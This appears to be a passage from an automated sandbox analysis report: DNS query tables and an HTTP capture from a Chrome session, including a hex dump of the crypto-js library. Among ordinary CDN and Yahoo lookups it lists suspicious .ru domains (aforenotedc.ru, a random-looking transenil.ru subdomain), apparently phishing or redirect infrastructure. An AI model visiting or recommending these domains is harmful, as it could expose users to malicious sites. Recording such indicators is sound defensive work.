                                                                                  Oct 2, 2024 17:50:07.059087038 CEST192.168.2.41.1.1.10x6d16Standard query (0)3bie4c8mhxoidlx9qnkhgzwaqkeeuqs4w0zy8igcwedso5x2pi2in4ndhf.transenil.ru65IN (0x0001)false
                                                                                  Oct 2, 2024 17:50:07.950879097 CEST192.168.2.41.1.1.10xc4bStandard query (0)www.yahoo.comA (IP address)IN (0x0001)false
                                                                                  Oct 2, 2024 17:50:07.951280117 CEST192.168.2.41.1.1.10xdae2Standard query (0)www.yahoo.com65IN (0x0001)false
                                                                                  Oct 2, 2024 17:50:09.276443005 CEST192.168.2.41.1.1.10xac57Standard query (0)csp.yahoo.comA (IP address)IN (0x0001)false
                                                                                  Oct 2, 2024 17:50:09.276669979 CEST192.168.2.41.1.1.10xc26cStandard query (0)csp.yahoo.com65IN (0x0001)false
                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                  Oct 2, 2024 17:49:35.107383013 CEST1.1.1.1192.168.2.40x41eNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                  Oct 2, 2024 17:49:35.107383013 CEST1.1.1.1192.168.2.40x41eNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                  Oct 2, 2024 17:49:35.107840061 CEST1.1.1.1192.168.2.40xdce8No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                  Oct 2, 2024 17:49:35.967258930 CEST1.1.1.1192.168.2.40xe530No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                  Oct 2, 2024 17:49:35.967258930 CEST1.1.1.1192.168.2.40xe530No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                  Oct 2, 2024 17:49:35.967302084 CEST1.1.1.1192.168.2.40x9266No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                  Oct 2, 2024 17:49:37.523093939 CEST1.1.1.1192.168.2.40xfed8No error (0)href.li192.0.78.27A (IP address)IN (0x0001)false
                                                                                  Oct 2, 2024 17:49:37.523093939 CEST1.1.1.1192.168.2.40xfed8No error (0)href.li192.0.78.26A (IP address)IN (0x0001)false
                                                                                  Oct 2, 2024 17:49:38.546134949 CEST1.1.1.1192.168.2.40x98f8No error (0)www.google.com142.250.184.196A (IP address)IN (0x0001)false
                                                                                  Oct 2, 2024 17:49:38.546180010 CEST1.1.1.1192.168.2.40xf86No error (0)www.google.com65IN (0x0001)false
                                                                                  Oct 2, 2024 17:49:38.667680025 CEST1.1.1.1192.168.2.40x6e5cNo error (0)9zg.aforenotedc.ru65IN (0x0001)false
                                                                                  Oct 2, 2024 17:49:38.818161011 CEST1.1.1.1192.168.2.40x9af4No error (0)9zg.aforenotedc.ru172.67.214.183A (IP address)IN (0x0001)false
                                                                                  Oct 2, 2024 17:49:38.818161011 CEST1.1.1.1192.168.2.40x9af4No error (0)9zg.aforenotedc.ru104.21.23.247A (IP address)IN (0x0001)false
                                                                                  Oct 2, 2024 17:49:41.592250109 CEST1.1.1.1192.168.2.40x84e3No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                  Oct 2, 2024 17:49:41.592250109 CEST1.1.1.1192.168.2.40x84e3No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                  Oct 2, 2024 17:49:41.592250109 CEST1.1.1.1192.168.2.40x84e3No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                  Oct 2, 2024 17:49:41.592250109 CEST1.1.1.1192.168.2.40x84e3No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                  Oct 2, 2024 17:49:41.593017101 CEST1.1.1.1192.168.2.40x110No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                  Oct 2, 2024 17:49:41.593017101 CEST1.1.1.1192.168.2.40x110No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                  Oct 2, 2024 17:49:41.593027115 CEST1.1.1.1192.168.2.40xba84No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                  Oct 2, 2024 17:49:41.593813896 CEST1.1.1.1192.168.2.40x2d4eNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                  Oct 2, 2024 17:49:41.594119072 CEST1.1.1.1192.168.2.40xd4a9No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                  Oct 2, 2024 17:49:41.594119072 CEST1.1.1.1192.168.2.40xd4a9No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                  Oct 2, 2024 17:49:42.714196920 CEST1.1.1.1192.168.2.40x4313No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                  Oct 2, 2024 17:49:42.714196920 CEST1.1.1.1192.168.2.40x4313No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                  Oct 2, 2024 17:49:42.714196920 CEST1.1.1.1192.168.2.40x4313No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                  Oct 2, 2024 17:49:42.714196920 CEST1.1.1.1192.168.2.40x4313No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                  Oct 2, 2024 17:49:43.405051947 CEST1.1.1.1192.168.2.40xfba2No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                  Oct 2, 2024 17:49:43.405051947 CEST1.1.1.1192.168.2.40xfba2No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                  Oct 2, 2024 17:49:43.405461073 CEST1.1.1.1192.168.2.40x93deNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                  Oct 2, 2024 17:50:05.566833973 CEST1.1.1.1192.168.2.40x6640No error (0)3bie4c8mhxoidlx9qnkhgzwaqkeeuqs4w0zy8igcwedso5x2pi2in4ndhf.transenil.ru188.114.97.3A (IP address)IN (0x0001)false
                                                                                  Oct 2, 2024 17:50:05.566833973 CEST1.1.1.1192.168.2.40x6640No error (0)3bie4c8mhxoidlx9qnkhgzwaqkeeuqs4w0zy8igcwedso5x2pi2in4ndhf.transenil.ru188.114.96.3A (IP address)IN (0x0001)false
                                                                                  Oct 2, 2024 17:50:05.600708008 CEST1.1.1.1192.168.2.40x1f46No error (0)3bie4c8mhxoidlx9qnkhgzwaqkeeuqs4w0zy8igcwedso5x2pi2in4ndhf.transenil.ru65IN (0x0001)false
                                                                                  Oct 2, 2024 17:50:07.063206911 CEST1.1.1.1192.168.2.40xdc6fNo error (0)yahoo.com98.137.11.163A (IP address)IN (0x0001)false
                                                                                  Oct 2, 2024 17:50:07.063206911 CEST1.1.1.1192.168.2.40xdc6fNo error (0)yahoo.com98.137.11.164A (IP address)IN (0x0001)false
                                                                                  Oct 2, 2024 17:50:07.063206911 CEST1.1.1.1192.168.2.40xdc6fNo error (0)yahoo.com74.6.231.21A (IP address)IN (0x0001)false
                                                                                  Oct 2, 2024 17:50:07.063206911 CEST1.1.1.1192.168.2.40xdc6fNo error (0)yahoo.com74.6.143.26A (IP address)IN (0x0001)false
                                                                                  Oct 2, 2024 17:50:07.063206911 CEST1.1.1.1192.168.2.40xdc6fNo error (0)yahoo.com74.6.143.25A (IP address)IN (0x0001)false
                                                                                  Oct 2, 2024 17:50:07.063206911 CEST1.1.1.1192.168.2.40xdc6fNo error (0)yahoo.com74.6.231.20A (IP address)IN (0x0001)false
                                                                                  Oct 2, 2024 17:50:07.150028944 CEST1.1.1.1192.168.2.40x20a6No error (0)3bie4c8mhxoidlx9qnkhgzwaqkeeuqs4w0zy8igcwedso5x2pi2in4ndhf.transenil.ru188.114.97.3A (IP address)IN (0x0001)false
                                                                                  Oct 2, 2024 17:50:07.150028944 CEST1.1.1.1192.168.2.40x20a6No error (0)3bie4c8mhxoidlx9qnkhgzwaqkeeuqs4w0zy8igcwedso5x2pi2in4ndhf.transenil.ru188.114.96.3A (IP address)IN (0x0001)false
                                                                                  Oct 2, 2024 17:50:07.183741093 CEST1.1.1.1192.168.2.40x6d16No error (0)3bie4c8mhxoidlx9qnkhgzwaqkeeuqs4w0zy8igcwedso5x2pi2in4ndhf.transenil.ru65IN (0x0001)false
                                                                                  Oct 2, 2024 17:50:07.957856894 CEST1.1.1.1192.168.2.40xc4bNo error (0)www.yahoo.comme-ycpi-cf-www.g06.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                  Oct 2, 2024 17:50:07.957856894 CEST1.1.1.1192.168.2.40xc4bNo error (0)me-ycpi-cf-www.g06.yahoodns.net87.248.119.252A (IP address)IN (0x0001)false
                                                                                  Oct 2, 2024 17:50:07.957856894 CEST1.1.1.1192.168.2.40xc4bNo error (0)me-ycpi-cf-www.g06.yahoodns.net87.248.119.251A (IP address)IN (0x0001)false
                                                                                  Oct 2, 2024 17:50:07.958997965 CEST1.1.1.1192.168.2.40xdae2No error (0)www.yahoo.comme-ycpi-cf-www.g06.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                  Oct 2, 2024 17:50:08.304867029 CEST1.1.1.1192.168.2.40xfa91No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                  Oct 2, 2024 17:50:08.304867029 CEST1.1.1.1192.168.2.40xfa91No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                  Oct 2, 2024 17:50:09.283904076 CEST1.1.1.1192.168.2.40xac57No error (0)csp.yahoo.commedia-router-brb1.prod.media.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                  Oct 2, 2024 17:50:09.283904076 CEST1.1.1.1192.168.2.40xac57No error (0)media-router-brb1.prod.media.g03.yahoodns.net188.125.72.139A (IP address)IN (0x0001)false
                                                                                  Oct 2, 2024 17:50:09.286056995 CEST1.1.1.1192.168.2.40xc26cNo error (0)csp.yahoo.commedia-router-brb1.prod.media.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                  Oct 2, 2024 17:50:27.331438065 CEST1.1.1.1192.168.2.40x5160No error (0)windowsupdatebg.s.llnwi.net46.228.146.0A (IP address)IN (0x0001)false
                                                                                  Oct 2, 2024 17:51:18.037847996 CEST1.1.1.1192.168.2.40xb793No error (0)windowsupdatebg.s.llnwi.net87.248.204.0A (IP address)IN (0x0001)false
                                                                                  • cdnjs.cloudflare.com
                                                                                  • slscr.update.microsoft.com
                                                                                  • href.li
                                                                                  • 9zg.aforenotedc.ru
                                                                                  • https:
                                                                                    • code.jquery.com
                                                                                    • challenges.cloudflare.com
                                                                                    • 3bie4c8mhxoidlx9qnkhgzwaqkeeuqs4w0zy8igcwedso5x2pi2in4ndhf.transenil.ru
                                                                                    • yahoo.com
                                                                                    • www.yahoo.com
                                                                                  • fs.microsoft.com
                                                                                  • csp.yahoo.com
                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.449738104.17.25.144433244C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-02 15:49:35 UTC614OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                                  Host: cdnjs.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: cross-site
                                                                                  Sec-Fetch-Mode: no-cors
                                                                                  Sec-Fetch-Dest: script
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2024-10-02 15:49:35 UTC930INHTTP/1.1 200 OK
                                                                                  Date: Wed, 02 Oct 2024 15:49:35 GMT
                                                                                  Content-Type: application/javascript; charset=utf-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Access-Control-Allow-Origin: *
                                                                                  Cache-Control: public, max-age=30672000
                                                                                  ETag: W/"61182885-40eb"
                                                                                  Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                                  cf-cdnjs-via: cfworker/kv
                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                  Timing-Allow-Origin: *
                                                                                  X-Content-Type-Options: nosniff
                                                                                  CF-Cache-Status: HIT
                                                                                  Age: 495677
                                                                                  Expires: Mon, 22 Sep 2025 15:49:35 GMT
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c%2BzqwGVFp8PXCvI%2FfBQ1zfoTAd4B3jki6BnYW0qQ48jHguSSNljhY4FSQl1wRFgKlliP38nOHKvG11sCdZY4we0NAha%2BcUeN2cVS1n4Q8ZuhcF3iz0Op%2FweLzvr7hFG9z4bgFWA6"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                  Strict-Transport-Security: max-age=15780000
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8cc5d7e1dded8c9c-EWR
                                                                                  2024-10-02 15:49:35 UTC439INData Raw: 37 39 37 31 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                                  Data Ascii: 7971!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                                  2024-10-02 15:49:35 UTC1369INData Raw: 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 7c 7c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 65 2e 70 72 6f
                                                                                  Data Ascii: to?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.pro
                                                                                  2024-10-02 15:49:35 UTC1369INData Raw: 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65 73 28 34 29 2e
                                                                                  Data Ascii: s.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes)try{return i.randomBytes(4).
                                                                                  2024-10-02 15:49:35 UTC1369INData Raw: 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c 63 3b 61 2b 3d 6f 29 74 68 69 73 2e 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 28 69 2c
                                                                                  Data Ascii: data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c;a+=o)this._doProcessBlock(i,
                                                                                  2024-10-02 15:49:35 UTC1369INData Raw: 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 35 5d 3d 65 5b 35 5d 2b 38 38 36 32 36 33 30 39 32 2b
                                                                                  Data Ascii: <8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]>>>0?1:0)|0,e[5]=e[5]+886263092+
                                                                                  2024-10-02 15:49:35 UTC1369INData Raw: 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49 5b 30 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 33 5d 3d 49 5b 33 5d 2b 28 49 5b 32 5d 3c 3c 38 7c
                                                                                  Data Ascii: [r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|I[0]>>>16)|0,t[3]=I[3]+(I[2]<<8|
                                                                                  2024-10-02 15:49:35 UTC1369INData Raw: 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 77 6f 72 64 73 2c
                                                                                  Data Ascii: t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:function(t){for(var e=t.words,
                                                                                  2024-10-02 15:49:35 UTC1369INData Raw: 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73
                                                                                  Data Ascii: .indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrs
                                                                                  2024-10-02 15:49:35 UTC1369INData Raw: 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69 73 2e 5f 68 61 73 68 2e 77 6f 72 64 73 2c 73 3d 74 5b 65 2b 30 5d 2c 63 3d 74 5b 65 2b
                                                                                  Data Ascii: tend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=this._hash.words,s=t[e+0],c=t[e+
                                                                                  2024-10-02 15:49:35 UTC1369INData Raw: 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41 5b 35 30 5d 29 2c 62 3d 44 28 62 2c 78 2c 53 2c 6d 2c 66 2c 32 31 2c 41 5b 35 31 5d 29
